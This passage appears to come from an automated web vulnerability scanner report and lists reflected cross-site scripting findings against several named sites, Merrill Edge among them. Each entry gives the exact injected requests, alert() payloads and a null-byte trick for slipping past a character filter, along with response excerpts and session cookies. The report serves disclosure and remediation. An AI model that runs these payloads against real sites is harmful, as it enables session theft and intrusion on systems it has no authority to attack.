Connection: close
Content-Type: text/html;charset=UTF-8
Content-Length: 14878

<!DOCTYPE html
    PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
   <hea
...[SNIP]...
<!-- store?5e722--><a>6ccf7c9b600=1 -->
...[SNIP]...

3.104. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload 41326><script>alert(1)</script>d2be1bfeaa9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:43 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=sgl5a4ygdcxxmom2wnek3a45; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 117507
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:24:43 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&41326><script>alert(1)</script>d2be1bfeaa9=1&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; h
...[SNIP]...

3.105. http://www.learningsolutions.com.hk/index.php [Itemid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The value of the Itemid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f639"><script>alert(1)</script>217975010b0 was submitted in the Itemid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /index.php?option=com_content&task=view&id=7&Itemid=133f639"><script>alert(1)</script>217975010b0 HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:56:58 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:56:57 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:56:58 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:56:58 GMT
Connection: close
Content-Type: text/html
Content-Length: 32190


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
<a href="http://www.learningsolutions.com.hk/index.php?option=com_content&amp;task=view&amp;id=7&amp;Itemid=133f639"><script>alert(1)</script>217975010b0&amp;lang=en">
...[SNIP]...

3.106. http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.macaudailytimes.com.mo
Path:   /times-lab/21109-Tragedy-our-Commons.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload bdaa0'-alert(1)-'045651d38d6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1 HTTP/1.1
Host: www.macaudailytimes.com.mo
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:17:24 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.3.4
X-Powered-By: PHP/5.3.4
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; path=/; domain=.macaudailytimes.com.mo
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: VivvoSessionId=378925c14d4a02242aec2; expires=Fri, 04-Feb-2011 01:17:24 GMT; path=/; domain=.macaudailytimes.com.mo
Connection: close
Content-Type: text/html
Content-Length: 49361

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en-US" xml:lang="en-US">
   <he
...[SNIP]...
ytimes.com.mo/index.php', {
                   parameters: {
                       action: 'comment',
                       cmd: 'proxy',
                       pg: pg,
                       CURRENT_URL: 'http://www.macaudailytimes.com.mo/times-lab/21109-Tragedy-our-Commons.html?bdaa0'-alert(1)-'045651d38d6=1',
                       article_id: 21109,
                       template_output: 'box/comments'
                   }
               });
           }
       </script>
...[SNIP]...

3.107. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007604f"><script>alert(1)</script>840cc046a86 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7604f"><script>alert(1)</script>840cc046a86 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?%007604f"><script>alert(1)</script>840cc046a86=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=FwKDfC5UaLvLmPA3/vdE3wVpJbCYF6aoq9ME4h10pHxdFOeTDBIFhxyADd5fHRG65hHfGJnE5rUpfugYtnkgKWMr4wEEjdCU9Zeyv9c9nyuZ9ajXGLsX6wSBI4PRGuqZeffWAWD8TXDbIejjTvCYkbFov2pPkDo+gDEnwFEI4CKbgc+L6yLHjiunniusE7RlQufJTarN0GcAtdKb0W7NxlR8mE+atUu/k7IFRG3ALXC9MewlqNy49LG2cQoAUl8hoyfFHWrpqsEBj570XPZKezKTMIhDfhzgU1ooRdm+jCcmZUb3cuAe9m+Acdd3UnOmIrVunF9zamI568Sqy7ySY7T54DOMkcgNVQ/SXf1jZEzIkIBDE6gZzJDZXFDkLrWemEpbDdnvp7v6cN/9D72eweH6lbkKrMA4dfwxzBvTvsRN71v84qFbr0LNHCv0nk5G1xNzc5lJyLJli5QWgXz6Cy7MP4dsw/2LDub5gP+f3mMv3R/msQI9r34FCNsp6P570jCzZMWMAG7tgAVspoHw/rIQin6C0ulXdk/Y/s6Pc/XZ5HvWqcsg8wBqs/J6kvZTPGA5c2xH0edEWiYxfHviEOTdeYXU3ofRPSUF09eXe4OA5fabdRVOaq0LmIWGhcFP; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=48fba909101349b2b1f5d2e57c206442; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99577


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.7604f"><script>alert(1)</script>840cc046a86=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.108. http://www.merrilledge.com/m/pages/self-directed-investing.aspx [src_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %0013948'%3bf91d272c668 was submitted in the src_cd parameter. This input was echoed as 13948';f91d272c668 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/self-directed-investing.aspx?src_cd=BAC1%0013948'%3bf91d272c668 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:16 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=hoJ5bVwThbLH86Bjyu48Es2jRhc8iOESnqDXj0LnEg1csQRMXjHDOb4jHvPkIhyGgEqr7X6vYdBuaqqVx+kE9qPd459uOwbm4W/yYiwnrb5gJZHd76NalTrAfQ/gCOoYs2ynyhGhoKNjaFMSBZBEj1wfT8do3SbvUvvYfgahTCyttCimYfLHcLaGRvGWm8BmNux9oY5ScVwyCYCj2856TGu+RGzmr0gSK8WxcLcxPWoYFa587s8fo2h3NtiXW7Tc4Mpy++mj/fEdWpr2LH5oMtEpZtkHBKUvM+bv6Aiy9mlOd6DHj7/CXbS7wfOq70DKhDnvs3LUxDIqRJ+jdP+JnUPekYkzYP2/08x1ik2WQoNhv6N/I8Trn5VBOgyUO7UeU5j4eRemhUY3qAkQPs+gMyJShzBKWsjwlXC0mj+vPbOyfLsHQemSqbrr7BlB6NabnVeWcrpZe6FiSYMhSFqsTHmMeJSn8IuFBQcm6haafR+SwCKuhzQ3+OBP8P4cszZPGskJJCmA19e5UYQGNwBkfL1qjLexQiJqnH5tDWSffceN0O4Q4FgsynOdkYIqSsuxyKGesd/GsS2tEaNZ3zuKoxwzeMNzsWxYHXaLYTcjodahqcQDtZyer8BulQMpAq7U; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=88bab72aaec248caa0bda82a0753db2b; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 71891


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'BAC1.13948';f91d272c668'
,'Page' : 'self-directed-investing'
,'preview' : false
};
//]]>
...[SNIP]...

3.109. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0093556"><script>alert(1)</script>754868bc16e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 93556"><script>alert(1)</script>754868bc16e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?%0093556"><script>alert(1)</script>754868bc16e=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jMony3R0uEAbpypigm1EqY9Eg0ka5p+s44FIvc2oUz5Z/wm8XPoHB57oXX6p1ZQA1DMjN7Fkqd7yMuSEoD+LuEY+PIcpqc1A+WhYxAVvAS5Mie9+h3Xg+4c3+kYlFSvEz3UpkPXz2dFWHd4q8OPwN7iE9R1mkHhxNdUlIgpDnfnTKg9TIu4lpNgijOTXs7WcTVqT1waWnPj5TycKZSglP/Y1ipyGZ/Fj8KAUBAXlxRS2ncxyP0ksv3C//Cpm+KmfY/dH8g7dE14aedon04IBavIlUgxkxGyknF/+dEUjIKLMQvQ0EX9oEli4zbjRdIhyNrwAr+x0+U094wy+JR9858XxOamVAke3rmbX53dEhO4t0kp9QYiArkeppHcpC6Z9RtxIzxoshDC9wgy0gE7g7hw/O8nbph9a/nrYz/THwFlHWXiMvyr9oPT8hkJ0LFjAXMCTs/me9ZcJjDmYlROpBRtAeF5epzMrZyaDqD2QaD6P9CsJbJ2hUQ0HO4+VGOcJj3VkIC5aMkOoah0L85ZoaFRerZaLlRxcon+yWX/xl7wYZ+qw7MWYXE0z2CPIlEMtKGzocLzcccMuREJylnZJ89GC5zpCTyCvcr4hTZ+4xyLR8hNutAJADZGh34QNjAaM; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=33db602922214f42975d86f8f6f2abba; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 92020


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.93556"><script>alert(1)</script>754868bc16e=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.110. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx [src_cd parameter]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The value of the src_cd request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %00ed4ab'%3b713afc694b6 was submitted in the src_cd parameter. This input was echoed as ed4ab';713afc694b6 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1%00ed4ab'%3b713afc694b6&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:20:19 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=Y4Z5b3uo6rKQp7PZz1s7s9yXgmFTKijqUV015O8wStTxc7G2C5c/kbFP4UDJSZSCfc9kU1Zw0HPh6llknGXwT7FshfHuhHre4H12yqv+NsahK2hDOuHu+3ZVPSGQegqEiFwbgiyXej8GttJGr4jmDlzRt2NMfbp9kjsuFK145M8vpfup6jzSHS0+G/3w8oSVuzTS9SNAv261lf9YY2QISx+/0X92nDD+NHMbyTU6YJt7RUGp5FU8gFZQhAEDkxssVsz6dR2qsnUQanaggpG+B6Vs9X+ZqD8ZBjGltqkjuILtZiZmdgL0c0Gme4lSluedVE1O2mwh6P04o2UIfbyLMVDJihe7PxeeVfsRVm/cZ2gWBeaQY6wEGEO/+R+ong+zsziMbYL9onbmbQSNjjKnYnOQtptOrCFoSyfvTK/V0R5q4LwxjyoTyDhOxE3BT8otfSw3ZmyeeW2KE3DBGncDuOSKG1hawQgLNpZrFmk1W59jk6WWXLdREST1E5h28CX2HVON8CVqCBuI23KewBu/Sqs5c5q2Jwf5c14tiLzlrJqgZAgzlgNpZiHIjFJbgpz3j+/TxYDc3CIP9gzOmSJtfAFP70l04QgCCQ1eAIi3toAaaj6vxuF5ZYNBaJ2U8Kht; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=2ac698daf6734109aef33eb2bf698471; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 69174


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><!-- Thank you for using
...[SNIP]...
<![CDATA[
var SPC = {
'Tactic' : 'SDMST1.ed4ab';713afc694b6'
,'Page' : 'zero-dollar-trades'
,'preview' : false
};
//]]>
...[SNIP]...

3.111. https://www.merrilledge.com/m/pages/home.aspx [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00b5a88"><script>alert(1)</script>68ae74c56a4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as b5a88"><script>alert(1)</script>68ae74c56a4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /m/pages/home.aspx?%00b5a88"><script>alert(1)</script>68ae74c56a4=1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:52 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=uHHgf03wURm9mvTJ9rrHz3gor/OaFylTVOa7LZNqyrpVkFQYgCjxrq1MlJxhpv2s8S5SnvotXt7tQRkg1oj8ac6TAyCDYWVk5OI6q60ucqyCid0nYOfasFeN5k79muZtxFnXpPrW5HggpNGzxjZBbrtgttnzLQoi0NdJ0EATioVlrNut1YRVGoL21K2kSPLzvUBBFf6oZYt7sN64q7mizmdGpLFbgCB08LFW8zuvv+u5e/wyWlN+FV8JFqyNfgCUCwcLY3BiIcuSBGID9GafFcg/ENw3HMU9CfxVHKKxripqd3lFzMgHxffHzdLwD6oI95pvKnQPK5vOFdj69JNFwgpQRG9zYy7q7GpgQUqfbrqJ+NLI8LL/PwBtIdRBr9/dBFruWJGWEX3uAU+nlx0q6Taj6ij93G/Hh/jviT3UsQFCVY60yf+Xlei7TQC9CbWMDDe3VpZk2Wjq0Q/vGHKRGh//LFI1MbqU/ew6isZ33kXOvh86d/ZnJxtYefczmmtP/gyln26n1iRLUiAMsMBIxtSn3GMHUMrEOtIwPlwAyFiHTYxLtlzOQloZa+n1jge5HAkGzyGVBZsToP7YAZkibI9njnxdCxpJ1KOBkLJUBU+W3m2MLXnua2iEZv7vF5ql; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=64d545196def45c0ab618229e403d55c; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 105349


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<a href="../System/SearchResults.aspx?.b5a88"><script>alert(1)</script>68ae74c56a4=1&k=" id="ctl00_ECMSSearchTextBox1_srchAnchor1" class="btn" onclick="return objSearchWidgetLibrary.onsearchclick1('ctl00_ECMSSearchTextBox1_srcText','ctl00_ECMSSearchTextBox1_srchAnchor1')">
...[SNIP]...

3.112. http://www.retirement.merrilledge.com/IRA/ScriptResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/ScriptResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %009bb58'-alert(1)-'f918fae9796 was submitted in the d parameter. This input was echoed as 9bb58'-alert(1)-'f918fae9796 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/ScriptResource.axd?d=aMsfwGC65viXscZammbwz6zVFIwHFO4g83huxlAC0KuLGg8lFje6MewypzmXEh1Q-UpPplE2gpclxViF2RgXdWh4YVn0Q7OU4DI9NURWJHVBNMFF62hTMIOAgq_f-eSgwyY66kBWIgZWwjCsZf_0Klh7YwLof_ssMm6kcCPx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
Referer: http://www.retirement.merrilledge.com/IRA/pages/home.aspx?%009627c%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Eac0806a009c=1
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=pD0NN85dpKsfx4BE99QArdi7rMPowZAp7prEX+xQsDRMZ5srEb6GWErE0ytcq4STJF6RcnSEbMoqhPh20hiX9f5JuWLY3Sh0nVg+L0bkPZp8qurqKXGj/drs1Sn6FhhN7RurCP0kK/9BVZCixCGwFXnpPgkR7yd/C9Ci7CEdBuIZ2phvHS3TICDfcva4faAIZLGdCT0rJZfWSHqGBGRuS5wEBKSn0pDx44kMCJ/a2HEa+Zu0fT4K1i/+8UG4BntMDKs6xA/EgABaMXNP6xhj+XNMspLCnGY0vTmGIQrLrF1rsj2YGCWdB5tUEWE3XtqwGQgQPxrqBH7Elt9ELCr4PmPlmXAd+5Ulox5teW48BAV7hlSkTVM2gm3bMpyD77ckeumpzJ5KAi4+BNg0DeBoTY9rYwqbZhf4vwXlnYb4lG5nVuz8sI+SKIWGUMDxfYcZBV6FBKk1Y5IlaVyugds9CwwP5J9aQ0dKe0g9/CjI6lRNE4NcVrDBUbv7c7WvxH0AFm3z2Rs4P96BbBwGYkdZ9CEz3D3DfltUqi+e1CLIx23wojYb+xRFVed43Jq5b7jCPdRqlbRDmd7jV0ZPq6jE1GPAZRnhhoxVr6Mh7eTrYMLa45VGhXkFG4gTdf3j3mfd; pxs=689c136b798e446897d1c2e0184bb0f5; BrowserCheckDone=true

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:33:28 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: no-cache
Pragma: no-cache
Expires: -1
Content-Type: text/html; charset=utf-8
Content-Length: 5518


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head><script type="text/javas
...[SNIP]...
/ira/scriptresource.axd?d=amsfwgc65vixsczammbwz6zvfiwhfo4g83huxlac0kulgg8lfje6mewypzmxeh1q-uppple2gpclxvif2rgxdwh4yvn0q7ou4di9nurwjhvbnmff62htmioagq_f-esgwyy66kbwigzwwjcszf_0klh7ywlof_ssmm6kccpx7r01%009bb58'-alert(1)-'f918fae9796&t=634278749235134076',"Exception has been thrown by the target of an invocation.","False","We are unable to display the page at this moment, Please try again later.","ctl00_MainContent_hdnStackTrace")
...[SNIP]...

3.113. http://www.retirement.merrilledge.com/IRA/WebResource.axd [d parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.retirement.merrilledge.com
Path:   /IRA/WebResource.axd

Issue detail

The value of the d request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload %003fef9'-alert(1)-'ad42e38776 was submitted in the d parameter. This input was echoed as 3fef9'-alert(1)-'ad42e38776 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context. NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /IRA/WebResource.axd?d=whzhnKw2EsLp_zO8-lOxmA2%003fef9'-alert(1)-'ad42e38776&t=634278761962828916 HTTP/1.1
Host: www.retirement.merrilledge.com
Proxy-Connection: keep-alive
